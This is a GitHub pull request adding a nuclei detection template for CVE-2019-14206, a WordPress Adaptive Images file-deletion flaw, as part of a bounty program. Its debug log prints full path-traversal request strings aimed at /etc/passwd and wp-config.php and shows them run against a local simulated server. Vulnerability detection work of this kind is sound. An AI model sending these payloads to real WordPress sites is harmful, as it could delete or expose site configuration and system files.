Skip to content

feat: add CVE-2019-14206 Arbitrary File Deletion (#14693) #14698

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Closed
developerfred wants to merge 1 commit into from
Closed

feat: add CVE-2019-14206 Arbitrary File Deletion (#14693) #14698

developerfred wants to merge 1 commit into from

Conversation

@developerfred
Copy link

@developerfred developerfred commented Jan 4, 2026
edited
Loading

PR Information

Template validation

debug

$ cd /Volumes/Codingsh/experimentos/nuclei-templates && nuclei -t http/cves/2019/CVE-2019-14206.yaml -u http://localhost:8888 -debug 2>&1 | head -200
__     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.5.1
		projectdiscovery.io
[WRN] Found 1 templates loaded with deprecated protocol syntax, update before v3 for continued support.
[INF] Current nuclei version: v3.5.1 (outdated)
[INF] Current nuclei-templates version: v10.3.6 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 176
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2019-14206] Dumped HTTP request for http://localhost:8888/wp-content/plugins/adaptive-images/adaptive-images-script.php
GET /wp-content/plugins/adaptive-images/adaptive-images-script.php HTTP/1.1
Host: localhost:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 15_0_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/19.0 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
[DBG] [CVE-2019-14206] Dumped HTTP response http://localhost:8888/wp-content/plugins/adaptive-images/adaptive-images-script.php
HTTP/1.0 200 OK
Connection: close
Content-Type: text/plain
Date: Sun, 04 Jan 2026 14:30:31 GMT
Server: SimpleHTTP/0.6 Python/3.14.1
X-Vulnerable: CVE-2019-14206
=== CVE-2019-14206 Adaptive Images Plugin ===
Version: 0.6.73 (Real Plugin Simulation)
[+] Plugin Parameters:
  source_file: 
  request_uri: 
  cache_dir: cache/adaptive-images
  wp_content: /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc/docker-test/../../wp-content
  resolution: 1024
  watch_cache: True
[+] VULNERABLE Path Construction:
  Pattern: /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc/docker-test/../../wp-content/cache/adaptive-images/1024{request_uri}
  Result: /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc/docker-test/../../wp-content/cache/adaptive-images/1024
[+] adaptive-images
[+] cache_dir
[+] resolution
[+] source_file
[+] wp_content
[+] request_uri
Test successful - plugin is vulnerable to CVE-2019-14206
[CVE-2019-14206:status-1] [http] [high] http://localhost:8888/wp-content/plugins/adaptive-images/adaptive-images-script.php
[CVE-2019-14206:word-2] [http] [high] http://localhost:8888/wp-content/plugins/adaptive-images/adaptive-images-script.php
[INF] [CVE-2019-14206] Dumped HTTP request for http://localhost:8888/wp-content/plugins/adaptive-images/adaptive-images-script.php?resolution=16000&adaptive-images-settings[source_file]=/etc/passwd&adaptive-images-settings[request_uri]=../etc/passwd
GET /wp-content/plugins/adaptive-images/adaptive-images-script.php?resolution=16000&adaptive-images-settings[source_file]=/etc/passwd&adaptive-images-settings[request_uri]=../etc/passwd HTTP/1.1
Host: localhost:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
[DBG] [CVE-2019-14206] Dumped HTTP response http://localhost:8888/wp-content/plugins/adaptive-images/adaptive-images-script.php?resolution=16000&adaptive-images-settings[source_file]=/etc/passwd&adaptive-images-settings[request_uri]=../etc/passwd
HTTP/1.0 200 OK
Connection: close
Content-Type: text/plain
Date: Sun, 04 Jan 2026 14:30:31 GMT
Server: SimpleHTTP/0.6 Python/3.14.1
X-Vulnerable: CVE-2019-14206
=== CVE-2019-14206 Adaptive Images Plugin ===
Version: 0.6.73 (Real Plugin Simulation)
[+] Plugin Parameters:
  source_file: /etc/passwd
  request_uri: ../etc/passwd
  cache_dir: cache/adaptive-images
  wp_content: /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc/docker-test/../../wp-content
  resolution: 1024
  watch_cache: True
[+] VULNERABLE Path Construction:
  Pattern: /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc/docker-test/../../wp-content/cache/adaptive-images/1024{request_uri}
  Result: /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc/docker-test/../../wp-content/cache/adaptive-images/1024../etc/passwd
[!!!] PATH TRAVERSAL DETECTED!
[!!!] Arbitrary file deletion possible
[+] adaptive-images
[+] cache_dir
[+] resolution
[+] source_file
[+] wp_content
[+] request_uri
Test successful - plugin is vulnerable to CVE-2019-14206
[INF] [CVE-2019-14206] Dumped HTTP request for http://localhost:8888/wp-content/plugins/adaptive-images/adaptive-images-script.php?resolution=16000&adaptive-images-settings[source_file]=../../../wp-content/uploads/test.jpg&adaptive-images-settings[cache_dir]=../../..&adaptive-images-settings[request_uri]=wp-config.php&adaptive-images-settings[watch_cache]=1
GET /wp-content/plugins/adaptive-images/adaptive-images-script.php?resolution=16000&adaptive-images-settings[source_file]=../../../wp-content/uploads/test.jpg&adaptive-images-settings[cache_dir]=../../..&adaptive-images-settings[request_uri]=wp-config.php&adaptive-images-settings[watch_cache]=1 HTTP/1.1
Host: localhost:8888
User-Agent: Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
[DBG] [CVE-2019-14206] Dumped HTTP response http://localhost:8888/wp-content/plugins/adaptive-images/adaptive-images-script.php?resolution=16000&adaptive-images-settings[source_file]=../../../wp-content/uploads/test.jpg&adaptive-images-settings[cache_dir]=../../..&adaptive-images-settings[request_uri]=wp-config.php&adaptive-images-settings[watch_cache]=1
HTTP/1.0 200 OK
Connection: close
Content-Type: text/plain
Date: Sun, 04 Jan 2026 14:30:31 GMT
Server: SimpleHTTP/0.6 Python/3.14.1
X-Vulnerable: CVE-2019-14206
=== CVE-2019-14206 Adaptive Images Plugin ===
Version: 0.6.73 (Real Plugin Simulation)
[+] Plugin Parameters:
  source_file: ../../../wp-content/uploads/test.jpg
  request_uri: wp-config.php
  cache_dir: ../../..
  wp_content: /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc/docker-test/../../wp-content
  resolution: 1024
  watch_cache: True
[+] VULNERABLE Path Construction:
  Pattern: /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc/docker-test/../../wp-content/../../../1024{request_uri}
  Result: /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc/docker-test/../../wp-content/../../../1024wp-config.php
[!!!] PATH TRAVERSAL DETECTED!
[!!!] Arbitrary file deletion possible
[+] adaptive-images
[+] cache_dir
[+] resolution
[+] source_file
[+] wp_content
[+] request_uri
Test successful - plugin is vulnerable to CVE-2019-14206
[CVE-2019-14206:word-1] [http] [high] http://localhost:8888/wp-content/plugins/adaptive-images/adaptive-images-script.php?resolution=16000&adaptive-images-settings[source_file]=../../../wp-content/uploads/test.jpg&adaptive-images-settings[cache_dir]=../../..&adaptive-images-settings[request_uri]=wp-config.php&adaptive-images-settings[watch_cache]=1
[CVE-2019-14206:status-2] [http] [high] http://localhost:8888/wp-content/plugins/adaptive-images/adaptive-images-script.php?resolution=16000&adaptive-images-settings[source_file]=../../../wp-content/uploads/test.jpg&adaptive-images-settings[cache_dir]=../../..&adaptive-images-settings[request_uri]=wp-config.php&adaptive-images-settings[watch_cache]=1
[INF] [CVE-2019-14206] Dumped HTTP request for http://localhost:8888/wp-content/plugins/adaptive-images/readme.txt
GET /wp-content/plugins/adaptive-images/readme.txt HTTP/1.1
Host: localhost:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
[DBG] [CVE-2019-14206] Dumped HTTP response http://localhost:8888/wp-content/plugins/adaptive-images/readme.txt
HTTP/1.0 404 Not Found
Connection: close
Content-Type: text/plain
Date: Sun, 04 Jan 2026 14:30:31 GMT
Server: SimpleHTTP/0.6 Python/3.14.1
Not Found
[INF] [CVE-2019-14206] Dumped HTTP request for http://localhost:8888/wp-content/plugins/adaptive-images/adaptive-images.php
GET /wp-content/plugins/adaptive-images/adaptive-images.php HTTP/1.1
Host: localhost:8888
User-Agent: Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
[DBG] [CVE-2019-14206] Dumped HTTP response http://localhost:8888/wp-content/plugins/adaptive-images/adaptive-images.php
HTTP/1.0 404 Not Found
Connection: close
Content-Type: text/plain
Date: Sun, 04 Jan 2026 14:30:31 GMT
Server: SimpleHTTP/0.6 Python/3.14.1
Not Found
[INF] Scan completed in 27.840375ms. 4 matches found.
  • Validated with a host running a vulnerable version and/or configuration (True Positive)
  • Validated with a host running a patched version and/or configuration (avoid False Positive)

Additional Details (leave it blank if not applicable)

[POC] - https://github.com/developerfred/cve-2019-14206-poc

Additional References:

/claim #14693

@algora-pbc algora-pbc bot mentioned this pull request Jan 4, 2026
Closed
@github-actions github-actions bot requested a review from DhiyaneshGeek January 4, 2026 14:22
@DhiyaneshGeek
Copy link
Member

DhiyaneshGeek commented Jan 5, 2026

Hi @developerfred

Thanks for participating in the Bounty Claim Program

we are moving forward with this PR #14694 which met all the requirements

Due to the following reason we are closing this PR

@DhiyaneshGeek DhiyaneshGeek added the Done Ready to merge label Jan 5, 2026
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@DhiyaneshGeek DhiyaneshGeek Awaiting requested review from DhiyaneshGeek

Assignees

@theamanrawat theamanrawat

Labels

🙋 Bounty claim Done Ready to merge

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

3 participants

@developerfred @DhiyaneshGeek @theamanrawat